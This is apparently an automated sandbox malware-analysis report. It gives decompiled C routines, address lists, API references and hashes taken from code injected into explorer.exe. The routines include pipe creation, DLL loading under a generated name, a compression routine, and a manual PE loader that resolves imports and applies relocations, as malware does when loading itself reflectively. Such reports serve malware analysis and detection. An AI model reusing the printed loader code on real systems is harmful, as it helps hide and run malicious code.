0x0008aa1c
0x0008aa1f
0x0008aa22
0x0008aa29
0x0008aa2c
0x0008aa33
0x0008aa36
0x0008aa40
0x0008aa41
0x0008aa44
0x0008aa46
0x0008aa47
0x0008aa5e
0x0008abde
0x00000000
0x0008abde
0x0008aa75
0x0008abaa
0x0008abb0
0x0008abbb
0x0008abbd
0x0008abc5
0x0008abc5
0x0008abcc
0x0008abce
0x0008abd7
0x0008abd7
0x00000000
0x0008abda
0x0008aa7b
0x0008aa7e
0x0008aa81
0x0008aa87
0x0008aa91
0x0008aa9b
0x0008aaa2
0x0008aaab
0x0008aaad
0x0008aab3
0x00000000
0x00000000
0x0008aabe
0x0008aac5
0x0008aac6
0x0008aacb
0x0008aacc
0x0008aacd
0x0008aad2
0x0008aad4
0x0008aad5
0x0008aad6
0x0008aad9
0x0008aadf
0x00000000
0x00000000
0x0008aae5
0x0008aaed
0x0008aaf0
0x0008aaf8
0x0008aafb
0x0008aafe
0x0008ab04
0x0008ab18
0x0008ab1e
0x0008ab24
0x0008ab4d
0x0008ab26
0x0008ab26
0x0008ab28
0x0008ab2a
0x0008ab32
0x0008ab3a
0x0008ab3f
0x0008ab3f
0x0008ab53
0x0008ab55
0x0008ab55
0x0008ab5d
0x0008ab65
0x0008ab66
0x0008ab6b
0x0008ab74
0x0008ab94
0x0008ab94
0x0008ab9c
0x0008ab9f
0x0008aba7
0x00000000
0x0008aba7
0x0008ab7d
0x0008ab81
0x00000000
0x00000000
0x0008ab89
0x00000000

APIs

memset.MSVCRT ref: 0008AA36
CreatePipe.KERNEL32(?,?,0000000C,00000000,00000000,00000000,00000000), ref: 0008AA5A
CreatePipe.KERNEL32(0008658A,?,0000000C,00000000), ref: 0008AA71

Part of subcall function 000885E5: RtlAllocateHeap.NTDLL(00000008,?,?,00088F65,00000100,?,00085FAC), ref: 000885F3

Part of subcall function 000885FB: HeapFree.KERNEL32(00000000,00000000,00000001), ref: 00088641

Strings

D, xrefs: 0008AA91

Memory Dump Source

Source File: 0000000E.00000002.906673569.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_80000_explorer.jbxd

Yara matches

Similarity

API ID: CreateHeapPipe$AllocateFreememset
String ID: D
API String ID: 2365139273-2746444292
Opcode ID: 63c930ab5ae651727d7be416772a4d1c9bf7e22bc7ac25b7d38a8b8279677106
Instruction ID: db70de6b9aaa29907dea9fad1e92da7b8083f6fbc426e583823b1b80d9bc7376
Opcode Fuzzy Hash: 63c930ab5ae651727d7be416772a4d1c9bf7e22bc7ac25b7d38a8b8279677106
Instruction Fuzzy Hash: D9511972E00209AFEB51EFA4CC45FEEB7B9BB08340F10416AF541E7252EB749A458B61

Uniqueness

Uniqueness Score: -1.00%

Function 0008C510, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 117
libraryCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E0008C510(void* __ebx, void* __edx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				void _v140;
				signed char _t14;
				char _t15;
				intOrPtr _t20;
				void* _t25;
				intOrPtr _t26;
				intOrPtr _t32;
				WCHAR* _t34;
				intOrPtr _t35;
				struct HINSTANCE__* _t37;
				int _t38;
				intOrPtr _t46;
				void* _t47;
				intOrPtr _t50;
				void* _t60;
				void* _t61;
				char _t62;
				char* _t63;
				void* _t65;
				intOrPtr _t66;
				char _t68;

				_t65 = __esi;
				_t61 = __edi;
				_t47 = __ebx;
				_t50 =  *0x9e688; // 0xb0000
				_t14 =  *(_t50 + 0x1898);
				if(_t14 == 0x100 ||  *((intOrPtr*)(_t50 + 4)) >= 0xa && (_t14 & 0x00000004) != 0) {
					_t15 = E000895C2(_t50, 0xb62);
					_t66 =  *0x9e688; // 0xb0000
					_t62 = _t15;
					_t67 = _t66 + 0xb0;
					_v8 = _t62;
					E00089621( &_v140, 0x40, L"%08x", E0008D442(_t66 + 0xb0, E0008C3BB(_t66 + 0xb0), 0));
					_t20 =  *0x9e688; // 0xb0000
					asm("sbb eax, eax");
					_t25 = E000895C2(_t67, ( ~( *(_t20 + 0xa8)) & 0x00000068) + 0x615);
					_t63 = "\\";
					_t26 =  *0x9e688; // 0xb0000
					_t68 = E000892C6(_t26 + 0x1020);
					_v12 = _t68;
					E000885B6( &_v8);
					_t32 =  *0x9e688; // 0xb0000
					_t34 = E000892C6(_t32 + 0x122a);
					 *0x9e784 = _t34;
					_t35 =  *0x9e684; // 0x14df8f0
					 *((intOrPtr*)(_t35 + 0x110))(_t68, _t34, 0, _t63,  &_v140, ".", L"dll", 0, _t63, _t25, _t63, _t62, 0, _t61, _t65, _t47);
					_t37 = LoadLibraryW( *0x9e784);
					 *0x9e77c = _t37;
					if(_t37 == 0) {
						_t38 = 0;
					} else {
						_push(_t37);
						_t60 = 0x28;
						_t38 = E0008E1B3(0x9bb40, _t60);
					}
					 *0x9e780 = _t38;
					E000885FB( &_v12, 0xfffffffe);
					memset( &_v140, 0, 0x80);
					if( *0x9e780 != 0) {
						goto L10;
					} else {
						E000885FB(0x9e784, 0xfffffffe);
						goto L8;
					}
				} else {
					L8:
					if( *0x9e780 == 0) {
						_t46 =  *0x9e6bc; // 0x14dfa18
						 *0x9e780 = _t46;
					}
					L10:
					return 1;
				}
			}

0x0008c510
0x0008c510
0x0008c510
0x0008c513
0x0008c51f
0x0008c52a
0x0008c546
0x0008c54b
0x0008c554
0x0008c556
0x0008c55e
0x0008c57f
0x0008c584
0x0008c591
0x0008c59c
0x0008c5a3
0x0008c5aa
0x0008c5bb
0x0008c5c1
0x0008c5c4
0x0008c5db
0x0008c5e7
0x0008c5ef
0x0008c5f6
0x0008c5fc
0x0008c608
0x0008c60e
0x0008c615
0x0008c628
0x0008c617
0x0008c617
0x0008c61a
0x0008c620
0x0008c625
0x0008c62a
0x0008c635
0x0008c647
0x0008c659
0x00000000
0x0008c65b
0x0008c662
0x00000000
0x0008c668
0x0008c669
0x0008c669
0x0008c670
0x0008c672
0x0008c677
0x0008c677
0x0008c67c
0x0008c680
0x0008c680

APIs

LoadLibraryW.KERNEL32 ref: 0008C608
memset.MSVCRT ref: 0008C647

Strings

dll, xrefs: 0008C5CA
%08x, xrefs: 0008C571

Memory Dump Source

Source File: 0000000E.00000002.906673569.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_80000_explorer.jbxd

Yara matches

Similarity

API ID: LibraryLoadmemset
String ID: %08x$dll
API String ID: 3406617148-2963171978
Opcode ID: 0e48b59045cb626c4d84cbaf597815a0b60bb8226869b6b2682a1fd05cf94f66
Instruction ID: a8df70be75e97c5ee857d688dea556373e1c036a45208cb8073b23abf85ff621
Opcode Fuzzy Hash: 0e48b59045cb626c4d84cbaf597815a0b60bb8226869b6b2682a1fd05cf94f66
Instruction Fuzzy Hash: A331C0B2A04244BBFB10FBA8EC49EAA73ECFB58754F444126F544D7292EB789D408725

Uniqueness

Uniqueness Score: -1.00%

Function 00092DB0, Relevance: 6.6, APIs: 5, Instructions: 341
COMMON

Download Yara Rule

C-Code - Quality: 99%

			E00092DB0(int _a4, signed int _a8) {
				int _v8;
				intOrPtr _v12;
				signed int _v16;
				void* __esi;
				void* _t137;
				signed int _t141;
				intOrPtr* _t142;
				signed int _t145;
				signed int _t146;
				intOrPtr _t151;
				intOrPtr _t161;
				intOrPtr _t162;
				intOrPtr _t167;
				intOrPtr _t170;
				signed int _t172;
				intOrPtr _t173;
				int _t184;
				intOrPtr _t185;
				intOrPtr _t188;
				signed int _t189;
				void* _t195;
				int _t202;
				int _t208;
				intOrPtr _t217;
				signed int _t218;
				int _t219;
				intOrPtr _t220;
				signed int _t221;
				signed int _t222;
				int _t224;
				int _t225;
				signed int _t227;
				intOrPtr _t228;
				int _t232;
				int _t234;
				signed int _t235;
				int _t239;
				void* _t240;
				int _t245;
				int _t252;
				signed int _t253;
				int _t254;
				void* _t257;
				void* _t258;
				int _t259;
				intOrPtr _t260;
				int _t261;
				signed int _t269;
				signed int _t271;
				intOrPtr* _t272;
				void* _t273;

				_t253 = _a8;
				_t272 = _a4;
				_t3 = _t272 + 0xc; // 0x452bf84d
				_t4 = _t272 + 0x2c; // 0x8df075ff
				_t228 =  *_t4;
				_t137 =  *_t3 + 0xfffffffb;
				_t229 =  <=  ? _t137 : _t228;
				_v16 =  <=  ? _t137 : _t228;
				_t269 = 0;
				_a4 =  *((intOrPtr*)( *_t272 + 4));
				asm("o16 nop [eax+eax]");
				while(1) {
					_t8 = _t272 + 0x16bc; // 0xec8b55c3
					_t141 =  *_t8 + 0x2a >> 3;
					_v12 = 0xffff;
					_t217 =  *((intOrPtr*)( *_t272 + 0x10));
					if(_t217 < _t141) {
						break;
					}
					_t11 = _t272 + 0x6c; // 0xa1ec8b55
					_t12 = _t272 + 0x5c; // 0x23e85000
					_t245 =  *_t11 -  *_t12;
					_v8 = _t245;
					_t195 =  *((intOrPtr*)( *_t272 + 4)) + _t245;
					_t247 =  <  ? _t195 : _v12;
					_t227 =  <=  ?  <  ? _t195 : _v12 : _t217 - _t141;
					if(_t227 >= _v16) {
						L7:
						if(_t253 != 4) {
							L10:
							_t269 = 0;
							__eflags = 0;
						} else {
							_t285 = _t227 - _t195;
							if(_t227 != _t195) {
								goto L10;
							} else {
								_t269 = _t253 - 3;
							}
						}
						E00095DD0(_t272, _t272, 0, 0, _t269);
						_t18 = _t272 + 0x14; // 0xc703f045
						_t19 = _t272 + 8; // 0x8d000040
						 *( *_t18 +  *_t19 - 4) = _t227;
						_t22 = _t272 + 0x14; // 0xc703f045
						_t23 = _t272 + 8; // 0x8d000040
						 *((char*)( *_t22 +  *_t23 - 3)) = _t227 >> 8;
						_t26 = _t272 + 0x14; // 0xc703f045
						_t27 = _t272 + 8; // 0x8d000040
						 *( *_t26 +  *_t27 - 2) =  !_t227;
						_t30 = _t272 + 0x14; // 0xc703f045
						_t31 = _t272 + 8; // 0x8d000040
						 *((char*)( *_t30 +  *_t31 - 1)) =  !_t227 >> 8;
						E00094B30(_t285,  *_t272);
						_t202 = _v8;
						_t273 = _t273 + 0x14;
						if(_t202 != 0) {
							_t208 =  >  ? _t227 : _t202;
							_v8 = _t208;
							_t36 = _t272 + 0x38; // 0xf47d8bff
							_t37 = _t272 + 0x5c; // 0x23e85000
							memcpy( *( *_t272 + 0xc),  *_t36 +  *_t37, _t208);
							_t273 = _t273 + 0xc;
							_t252 = _v8;
							 *( *_t272 + 0xc) =  *( *_t272 + 0xc) + _t252;
							 *((intOrPtr*)( *_t272 + 0x10)) =  *((intOrPtr*)( *_t272 + 0x10)) - _t252;
							 *((intOrPtr*)( *_t272 + 0x14)) =  *((intOrPtr*)( *_t272 + 0x14)) + _t252;
							 *(_t272 + 0x5c) =  *(_t272 + 0x5c) + _t252;
							_t227 = _t227 - _t252;
						}
						if(_t227 != 0) {
							E00094C70( *_t272,  *( *_t272 + 0xc), _t227);
							_t273 = _t273 + 0xc;
							 *( *_t272 + 0xc) =  *( *_t272 + 0xc) + _t227;
							 *((intOrPtr*)( *_t272 + 0x10)) =  *((intOrPtr*)( *_t272 + 0x10)) - _t227;
							 *((intOrPtr*)( *_t272 + 0x14)) =  *((intOrPtr*)( *_t272 + 0x14)) + _t227;
						}
						_t253 = _a8;
						if(_t269 == 0) {
							continue;
						}
					} else {
						if(_t227 != 0 || _t253 == 4) {
							if(_t253 != 0 && _t227 == _t195) {
								goto L7;
							}
						}
					}
					break;
				}
				_t142 =  *_t272;
				_t232 = _a4 -  *((intOrPtr*)(_t142 + 4));
				_a4 = _t232;
				if(_t232 == 0) {
					_t83 = _t272 + 0x6c; // 0xa1ec8b55
					_t254 =  *_t83;
				} else {
					_t59 = _t272 + 0x2c; // 0x8df075ff
					_t224 =  *_t59;
					if(_t232 < _t224) {
						_t65 = _t272 + 0x3c; // 0x830cc483
						_t66 = _t272 + 0x6c; // 0xa1ec8b55
						_t260 =  *_t66;
						__eflags =  *_t65 - _t260 - _t232;
						if( *_t65 - _t260 <= _t232) {
							_t67 = _t272 + 0x38; // 0xf47d8bff
							_t261 = _t260 - _t224;
							 *(_t272 + 0x6c) = _t261;
							memcpy( *_t67,  *_t67 + _t224, _t261);
							_t70 = _t272 + 0x16b0; // 0x7e89ffff
							_t188 =  *_t70;
							_t273 = _t273 + 0xc;
							_t232 = _a4;
							__eflags = _t188 - 2;
							if(_t188 < 2) {
								_t189 = _t188 + 1;
								__eflags = _t189;
								 *(_t272 + 0x16b0) = _t189;
							}
						}
						_t73 = _t272 + 0x38; // 0xf47d8bff
						_t74 = _t272 + 0x6c; // 0xa1ec8b55
						memcpy( *_t73 +  *_t74,  *((intOrPtr*)( *_t272)) - _t232, _t232);
						_t225 = _a4;
						_t273 = _t273 + 0xc;
						_t76 = _t272 + 0x6c;
						 *_t76 =  *(_t272 + 0x6c) + _t225;
						__eflags =  *_t76;
						_t78 = _t272 + 0x6c; // 0xa1ec8b55
						_t184 =  *_t78;
						_t79 = _t272 + 0x2c; // 0x8df075ff
						_t239 =  *_t79;
					} else {
						 *(_t272 + 0x16b0) = 2;
						_t61 = _t272 + 0x38; // 0xf47d8bff
						memcpy( *_t61,  *_t142 - _t224, _t224);
						_t62 = _t272 + 0x2c; // 0x8df075ff
						_t184 =  *_t62;
						_t273 = _t273 + 0xc;
						_t225 = _a4;
						_t239 = _t184;
						 *(_t272 + 0x6c) = _t184;
					}
					_t254 = _t184;
					 *(_t272 + 0x5c) = _t184;
					_t81 = _t272 + 0x16b4; // 0x3c468b3c
					_t185 =  *_t81;
					_t240 = _t239 - _t185;
					_t241 =  <=  ? _t225 : _t240;
					_t242 = ( <=  ? _t225 : _t240) + _t185;
					 *((intOrPtr*)(_t272 + 0x16b4)) = ( <=  ? _t225 : _t240) + _t185;
				}
				if( *(_t272 + 0x16c0) < _t254) {
					 *(_t272 + 0x16c0) = _t254;
				}
				if(_t269 == 0) {
					_t218 = _a8;
					__eflags = _t218;
					if(_t218 == 0) {
						L34:
						_t89 = _t272 + 0x3c; // 0x830cc483
						_t219 =  *_t272;
						_t145 =  *_t89 - _t254 - 1;
						_a4 =  *_t272;
						_t234 = _t254;
						_v16 = _t145;
						_v8 = _t254;
						__eflags =  *((intOrPtr*)(_t219 + 4)) - _t145;
						if( *((intOrPtr*)(_t219 + 4)) > _t145) {
							_v8 = _t254;
							_t95 = _t272 + 0x5c; // 0x23e85000
							_a4 = _t219;
							_t234 = _t254;
							_t97 = _t272 + 0x2c; // 0x8df075ff
							__eflags =  *_t95 -  *_t97;
							if( *_t95 >=  *_t97) {
								_t98 = _t272 + 0x2c; // 0x8df075ff
								_t167 =  *_t98;
								_t259 = _t254 - _t167;
								_t99 = _t272 + 0x38; // 0xf47d8bff
								 *(_t272 + 0x5c) =  *(_t272 + 0x5c) - _t167;
								 *(_t272 + 0x6c) = _t259;
								memcpy( *_t99, _t167 +  *_t99, _t259);
								_t103 = _t272 + 0x16b0; // 0x7e89ffff
								_t170 =  *_t103;
								_t273 = _t273 + 0xc;
								__eflags = _t170 - 2;
								if(_t170 < 2) {
									_t172 = _t170 + 1;
									__eflags = _t172;
									 *(_t272 + 0x16b0) = _t172;
								}
								_t106 = _t272 + 0x2c; // 0x8df075ff
								_t145 = _v16 +  *_t106;
								__eflags = _t145;
								_a4 =  *_t272;
								_t108 = _t272 + 0x6c; // 0xa1ec8b55
								_t234 =  *_t108;
								_v8 = _t234;
							}
						}
						_t255 = _a4;
						_t220 =  *((intOrPtr*)(_a4 + 4));
						__eflags = _t145 - _t220;
						_t221 =  <=  ? _t145 : _t220;
						_t146 = _t221;
						_a4 = _t221;
						_t222 = _a8;
						__eflags = _t146;
						if(_t146 != 0) {
							_t114 = _t272 + 0x38; // 0xf47d8bff
							E00094C70(_t255,  *_t114 + _v8, _t146);
							_t273 = _t273 + 0xc;
							_t117 = _t272 + 0x6c;
							 *_t117 =  *(_t272 + 0x6c) + _a4;
							__eflags =  *_t117;
							_t119 = _t272 + 0x6c; // 0xa1ec8b55
							_t234 =  *_t119;
						}
						__eflags =  *(_t272 + 0x16c0) - _t234;
						if( *(_t272 + 0x16c0) < _t234) {
							 *(_t272 + 0x16c0) = _t234;
						}
						_t122 = _t272 + 0x16bc; // 0xec8b55c3
						_t123 = _t272 + 0xc; // 0x452bf84d
						_t257 =  *_t123 - ( *_t122 + 0x2a >> 3);
						__eflags = _t257 - 0xffff;
						_t258 =  >  ? 0xffff : _t257;
						_t124 = _t272 + 0x2c; // 0x8df075ff
						_t151 =  *_t124;
						_t125 = _t272 + 0x5c; // 0x23e85000
						_t235 = _t234 -  *_t125;
						__eflags = _t258 - _t151;
						_t152 =  <=  ? _t258 : _t151;
						__eflags = _t235 - ( <=  ? _t258 : _t151);
						if(_t235 >= ( <=  ? _t258 : _t151)) {
							L49:
							__eflags = _t235 - _t258;
							_t154 =  >  ? _t258 : _t235;
							_a4 =  >  ? _t258 : _t235;
							__eflags = _t222 - 4;
							if(_t222 != 4) {
								L53:
								_t269 = 0;
								__eflags = 0;
							} else {
								_t161 =  *_t272;
								__eflags =  *(_t161 + 4);
								_t154 = _a4;
								if( *(_t161 + 4) != 0) {
									goto L53;
								} else {
									__eflags = _t154 - _t235;
									if(_t154 != _t235) {
										goto L53;
									} else {
										_t269 = _t222 - 3;
									}
								}
							}
							_t131 = _t272 + 0x38; // 0xf47d8bff
							_t132 = _t272 + 0x5c; // 0x23e85000
							E00095DD0(_t272, _t272,  *_t131 +  *_t132, _t154, _t269);
							_t134 = _t272 + 0x5c;
							 *_t134 =  *(_t272 + 0x5c) + _a4;
							__eflags =  *_t134;
							E00094B30( *_t134,  *_t272);
						} else {
							__eflags = _t235;
							if(_t235 != 0) {
								L46:
								__eflags = _t222;
								if(_t222 != 0) {
									_t162 =  *_t272;
									__eflags =  *(_t162 + 4);
									if( *(_t162 + 4) == 0) {
										__eflags = _t235 - _t258;
										if(_t235 <= _t258) {
											goto L49;
										}
									}
								}
							} else {
								__eflags = _t222 - 4;
								if(_t222 == 4) {
									goto L46;
								}
							}
						}
						asm("sbb edi, edi");
						_t271 =  ~_t269 & 0x00000002;
						__eflags = _t271;
						return _t271;
					} else {
						__eflags = _t218 - 4;
						if(_t218 == 4) {
							goto L34;
						} else {
							_t173 =  *_t272;
							__eflags =  *(_t173 + 4);
							if( *(_t173 + 4) != 0) {
								goto L34;
							} else {
								_t88 = _t272 + 0x5c; // 0x23e85000
								__eflags = _t254 -  *_t88;
								if(_t254 !=  *_t88) {
									goto L34;
								} else {
									return 1;
								}
							}
						}
					}
				} else {
					return 3;
				}
			}

0x00092db6
0x00092dbb
0x00092dbf
0x00092dc2
0x00092dc2
0x00092dc5
0x00092dca
0x00092dcf
0x00092dd2
0x00092dd7
0x00092dda
0x00092de0
0x00092de0
0x00092deb
0x00092dee
0x00092df5
0x00092dfa
0x00000000
0x00000000
0x00092e00
0x00092e05
0x00092e05
0x00092e0a
0x00092e10
0x00092e1a
0x00092e1f
0x00092e25
0x00092e44
0x00092e47
0x00092e52
0x00092e52
0x00092e52
0x00092e49
0x00092e49
0x00092e4b
0x00000000
0x00092e4d
0x00092e4d
0x00092e4d
0x00092e4b
0x00092e5a
0x00092e5f
0x00092e64
0x00092e6a
0x00092e6e
0x00092e71
0x00092e74
0x00092e7a
0x00092e7f
0x00092e82
0x00092e88
0x00092e8d
0x00092e93
0x00092e99
0x00092e9e
0x00092ea1
0x00092ea6
0x00092eaa
0x00092eae
0x00092eb1
0x00092eb4
0x00092ebd
0x00092ec4
0x00092ec7
0x00092eca
0x00092ecf
0x00092ed4
0x00092ed7
0x00092eda
0x00092eda
0x00092ede
0x00092ee7
0x00092eee
0x00092ef1
0x00092ef6
0x00092efb
0x00092efb
0x00092efe
0x00092f03
0x00000000
0x00000000
0x00092e27
0x00092e29
0x00092e36
0x00000000
0x00000000
0x00092e36
0x00092e29
0x00000000
0x00092e25
0x00092f09
0x00092f0e
0x00092f11
0x00092f14
0x00092fbf
0x00092fbf
0x00092f1a
0x00092f1a
0x00092f1a
0x00092f1f
0x00092f49
0x00092f4c
0x00092f4c
0x00092f51
0x00092f53
0x00092f55
0x00092f58
0x00092f5b
0x00092f63
0x00092f68
0x00092f68
0x00092f6e
0x00092f71
0x00092f74
0x00092f77
0x00092f79
0x00092f79
0x00092f7a
0x00092f7a
0x00092f77
0x00092f88
0x00092f8b
0x00092f8f
0x00092f94
0x00092f97
0x00092f9a
0x00092f9a
0x00092f9a
0x00092f9d
0x00092f9d
0x00092fa0
0x00092fa0
0x00092f21
0x00092f21
0x00092f31
0x00092f34
0x00092f39
0x00092f39
0x00092f3c
0x00092f3f
0x00092f42
0x00092f44
0x00092f44
0x00092fa3
0x00092fa5
0x00092fa8
0x00092fa8
0x00092fae
0x00092fb2
0x00092fb5
0x00092fb7
0x00092fb7
0x00092fc8
0x00092fca
0x00092fca
0x00092fd2
0x00092fe0
0x00092fe3
0x00092fe5
0x00093005
0x00093005
0x00093008
0x0009300e
0x0009300f
0x00093012
0x00093014
0x00093017
0x0009301a
0x0009301d
0x00093021
0x00093024
0x00093027
0x0009302a
0x0009302c
0x0009302c
0x0009302f
0x00093031
0x00093031
0x00093034
0x00093036
0x00093039
0x00093041
0x00093044
0x00093049
0x00093049
0x0009304f
0x00093052
0x00093055
0x00093057
0x00093057
0x00093058
0x00093058
0x00093063
0x00093063
0x00093063
0x00093066
0x00093069
0x00093069
0x0009306c
0x0009306c
0x0009302f
0x0009306f
0x00093072
0x00093075
0x00093077
0x0009307a
0x0009307c
0x0009307f
0x00093082
0x00093084
0x00093087
0x0009308f
0x00093097
0x0009309a
0x0009309a
0x0009309a
0x0009309d
0x0009309d
0x0009309d
0x000930a0
0x000930a6
0x000930a8
0x000930a8
0x000930ae
0x000930b4
0x000930bd
0x000930c4
0x000930c6
0x000930c9
0x000930c9
0x000930cc
0x000930cc
0x000930cf
0x000930d1
0x000930d4
0x000930d6
0x000930f1
0x000930f1
0x000930f5
0x000930f8
0x000930fb
0x000930fe
0x00093114
0x00093114
0x00093114
0x00093100
0x00093100
0x00093102
0x00093106
0x00093109
0x00000000
0x0009310b
0x0009310b
0x0009310d
0x00000000
0x0009310f
0x0009310f
0x0009310f
0x0009310d
0x00093109
0x00093118
0x0009311b
0x00093120
0x0009312a
0x0009312a
0x0009312a
0x0009312d
0x000930d8
0x000930d8
0x000930da
0x000930e1
0x000930e1
0x000930e3
0x000930e5
0x000930e7
0x000930eb
0x000930ed
0x000930ef
0x00000000
0x00000000
0x000930ef
0x000930eb
0x000930dc
0x000930dc
0x000930df
0x00000000
0x00000000
0x000930df
0x000930da
0x00093137
0x00093139
0x00093139
0x00093144
0x00092fe7
0x00092fe7
0x00092fea
0x00000000
0x00092fec
0x00092fec
0x00092fee
0x00092ff2
0x00000000
0x00092ff4
0x00092ff4
0x00092ff4
0x00092ff7
0x00000000
0x00092ffb
0x00093004
0x00093004
0x00092ff7
0x00092ff2
0x00092fea
0x00092fd6
0x00092fdf
0x00092fdf

APIs

memcpy.MSVCRT ref: 00092EBD
memcpy.MSVCRT ref: 00092F34
memcpy.MSVCRT ref: 00092F63
memcpy.MSVCRT ref: 00092F8F
memcpy.MSVCRT ref: 00093044

Part of subcall function 00095DD0: memcpy.MSVCRT ref: 00095EAE

Part of subcall function 00094B30: memcpy.MSVCRT ref: 00094B5A

Memory Dump Source

Source File: 0000000E.00000002.906673569.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_80000_explorer.jbxd

Yara matches

Similarity

API ID: memcpy
String ID:
API String ID: 3510742995-0
Opcode ID: 02feba5ad5f49e0a995842d61c8ce91333d91de9632e587c2a68fb90f2e6a76c
Instruction ID: 1d6b34e382e40ef923690c284d6b27d1efaca96ebac1f7cec2adddd4b25623cc
Opcode Fuzzy Hash: 02feba5ad5f49e0a995842d61c8ce91333d91de9632e587c2a68fb90f2e6a76c
Instruction Fuzzy Hash: 47D10471A00A049FCB64CF6DC8D4AAAB7F1FF88304B24892DE88AC7751D771E945DB54

Uniqueness

Uniqueness Score: -1.00%

Function 00092B24, Relevance: 6.2, APIs: 4, Instructions: 219
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 52%

			E00092B24(intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
				signed int _v5;
				signed short _v12;
				intOrPtr* _v16;
				signed int* _v20;
				intOrPtr _v24;
				unsigned int _v28;
				signed short* _v32;
				struct HINSTANCE__* _v36;
				intOrPtr* _v40;
				signed short* _v44;
				intOrPtr _v48;
				unsigned int _v52;
				intOrPtr _v56;
				_Unknown_base(*)()* _v60;
				signed int _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				unsigned int _v76;
				intOrPtr _v80;
				signed int _v84;
				intOrPtr _v88;
				signed int _t149;
				void* _t189;
				signed int _t194;
				signed int _t196;
				intOrPtr _t236;

				_v72 =  *((intOrPtr*)(_a4 + 0x3c)) + _a4;
				_v24 = _v72;
				_t236 = _a4 -  *((intOrPtr*)(_v24 + 0x34));
				_v56 = _t236;
				if(_t236 == 0) {
					L13:
					while(0 != 0) {
					}
					_push(8);
					if( *((intOrPtr*)(_v24 + 0xbadc25)) == 0) {
						L35:
						_v68 =  *((intOrPtr*)(_v24 + 0x28)) + _a4;
						while(0 != 0) {
						}
						if(_a12 != 0) {
							 *_a12 = _v68;
						}
						 *((intOrPtr*)(_v24 + 0x34)) = _a4;
						return _v68(_a4, 1, _a8);
					}
					_v84 = 0x80000000;
					_t149 = 8;
					_v16 = _a4 +  *((intOrPtr*)(_v24 + (_t149 << 0) + 0x78));
					while( *((intOrPtr*)(_v16 + 0xc)) != 0) {
						_v36 = GetModuleHandleA( *((intOrPtr*)(_v16 + 0xc)) + _a4);
						if(_v36 == 0) {
							_v36 = LoadLibraryA( *((intOrPtr*)(_v16 + 0xc)) + _a4);
						}
						if(_v36 != 0) {
							if( *_v16 == 0) {
								_v20 =  *((intOrPtr*)(_v16 + 0x10)) + _a4;
							} else {
								_v20 =  *_v16 + _a4;
							}
							_v64 = _v64 & 0x00000000;
							while( *_v20 != 0) {
								if(( *_v20 & _v84) == 0) {
									_v88 =  *_v20 + _a4;
									_v60 = GetProcAddress(_v36, _v88 + 2);
								} else {
									_v60 = GetProcAddress(_v36,  *_v20 & 0x0000ffff);
								}
								if( *((intOrPtr*)(_v16 + 0x10)) == 0) {
									 *_v20 = _v60;
								} else {
									 *( *((intOrPtr*)(_v16 + 0x10)) + _a4 + _v64) = _v60;
								}
								_v20 =  &(_v20[1]);
								_v64 = _v64 + 4;
							}
							_v16 = _v16 + 0x14;
							continue;
						} else {
							_t189 = 0xfffffffd;
							return _t189;
						}
					}
					goto L35;
				}
				_t194 = 8;
				_v44 = _a4 +  *((intOrPtr*)(_v24 + 0x78 + _t194 * 5));
				_t196 = 8;
				_v48 =  *((intOrPtr*)(_v24 + 0x7c + _t196 * 5));
				while(0 != 0) {
				}
				while(_v48 > 0) {
					_v28 = _v44[2];
					_v48 = _v48 - _v28;
					_v28 = _v28 - 8;
					_v28 = _v28 >> 1;
					_v32 =  &(_v44[4]);
					_v80 = _a4 +  *_v44;
					_v52 = _v28;
					while(1) {
						_v76 = _v52;
						_v52 = _v52 - 1;
						if(_v76 == 0) {
							break;
						}
						_v5 = ( *_v32 & 0x0000ffff) >> 0xc;
						_v12 =  *_v32 & 0xfff;
						_v40 = (_v12 & 0x0000ffff) + _v80;
						if((_v5 & 0x000000ff) != 3) {
							if((_v5 & 0x000000ff) == 0xa) {
								 *_v40 =  *_v40 + _v56;
							}
						} else {
							 *_v40 =  *_v40 + _v56;
						}
						_v32 =  &(_v32[1]);
					}
					_v44 = _v32;
				}
				goto L13;
			}

0x00092b33
0x00092b39
0x00092b42
0x00092b45
0x00092b48
0x00000000
0x00092c39
0x00092c3d
0x00092c3f
0x00092c4d
0x00092d6b
0x00092d74
0x00092d77
0x00092d7b
0x00092d81
0x00092d89
0x00092d89
0x00092d91
0x00000000
0x00092d9c
0x00092c53
0x00092c5c
0x00092c6a
0x00092c6d
0x00092c8a
0x00092c91
0x00092ca3
0x00092ca3
0x00092caa
0x00092cba
0x00092cd2
0x00092cbc
0x00092cc4
0x00092cc4
0x00092cd5
0x00092cd9
0x00092ce9
0x00092d0c
0x00092d1e
0x00092ceb
0x00092cff
0x00092cff
0x00092d28
0x00092d44
0x00092d2a
0x00092d39
0x00092d39
0x00092d4c
0x00092d55
0x00092d55
0x00092d63
0x00000000
0x00092cac
0x00092cae
0x00000000
0x00092cae
0x00092caa
0x00000000
0x00092c6d
0x00092b50
0x00092b5e
0x00092b63
0x00092b6e
0x00092b71
0x00092b75
0x00092b77
0x00092b87
0x00092b90
0x00092b99
0x00092ba1
0x00092baa
0x00092bb5
0x00092bbb
0x00092bbe
0x00092bc1
0x00092bc8
0x00092bcf
0x00000000
0x00000000
0x00092bda
0x00092be8
0x00092bf3
0x00092bfd
0x00092c15
0x00092c22
0x00092c22
0x00092bff
0x00092c0a
0x00092c0a
0x00092c29
0x00092c29
0x00092c31
0x00092c31
0x00000000

APIs

GetModuleHandleA.KERNEL32(?), ref: 00092C84
LoadLibraryA.KERNEL32(?), ref: 00092C9D
GetProcAddress.KERNEL32(00000000,890CC483), ref: 00092CF9
GetProcAddress.KERNEL32(00000000,?), ref: 00092D18

Memory Dump Source

Source File: 0000000E.00000002.906673569.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_80000_explorer.jbxd

Yara matches

Similarity

API ID: AddressProc$HandleLibraryLoadModule
String ID:
